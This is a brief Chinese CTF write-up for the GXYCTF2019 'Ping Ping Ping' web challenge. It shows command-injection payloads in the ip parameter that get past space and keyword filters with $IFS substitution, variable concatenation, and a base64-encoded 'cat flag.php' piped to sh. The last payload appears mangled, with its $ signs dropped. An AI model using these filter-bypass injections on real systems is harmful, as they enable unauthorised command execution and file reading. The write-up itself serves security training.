GXYCTF2019-WEB-Ping Ping Ping

2020-04-08  本文已影响0人  le3f

复现地址:https://buuoj.cn/challenges#[GXYCTF2019]Ping%20Ping%20Ping

考察点:命令执行 空白字符绕过

输入|ls 显示flag.php


image.png

过滤了空格


image.png

过滤了某些符号


image.png

对flag字符进行了过滤


image.png

读取到index.php源文件


image.png

进行字符串拼接,读取到flag

/?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php

源码中对bash进行过滤,可以用sh
/?ip=127.0.0.1;echoIFS1Y2F0IGZsYWcucGhw|base64IFS1-d|sh

上一篇 下一篇

猜你喜欢

热点阅读